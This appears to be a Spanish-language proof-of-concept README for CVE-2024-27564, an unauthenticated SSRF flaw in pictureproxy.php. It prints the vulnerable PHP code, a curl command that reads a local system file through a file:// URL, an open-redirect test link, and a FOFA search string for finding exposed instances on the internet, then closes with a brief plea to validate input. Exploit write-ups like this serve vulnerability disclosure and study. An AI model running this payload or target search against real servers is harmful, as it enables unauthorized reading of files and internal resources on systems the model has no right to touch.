
Exploit de prueba de concepto para CVE-2024-27564, que demuestra SSRF a través de un parámetro URL no validado en pictureproxy.php. Incluye pruebas basadas en curl y búsqueda FOFA de instancias vulnerables.
Este proyecto demuestra una vulnerabilidad de Server-Side Request Forgery (SSRF) en el archivo pictureproxy.php.
Una vulnerabilidad en pictureproxy.php permite a atacantes remotos realizar solicitudes arbitrarias inyectando URLs en el parámetro url. Esta vulnerabilidad SSRF puede ser explotada sin autenticación, lo que la hace particularmente peligrosa.
El código vulnerable se encuentra en el archivo pictureproxy.php. El problema ocurre porque la función no valida correctamente el parámetro url. La variable $_GET['url'] se pasa a la función file_get_contents(), que obtiene contenido de la URL especificada. Esto puede llevar a SSRF.
Aquí hay una simple prueba de concepto que muestra cómo se puede explotar la vulnerabilidad:
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Para probar la vulnerabilidad, puedes usar el siguiente comando curl:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
Una prueba usando una vulnerabilidad de open redirect:
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg
Banner
"title="ChatGPT个人专用版""
Este proyecto resalta la importancia de validar adecuadamente las entradas del usuario para evitar vulnerabilidades SSRF. Siempre asegúrate de que parámetros como las URLs sean verificados minuciosamente antes de ser procesados.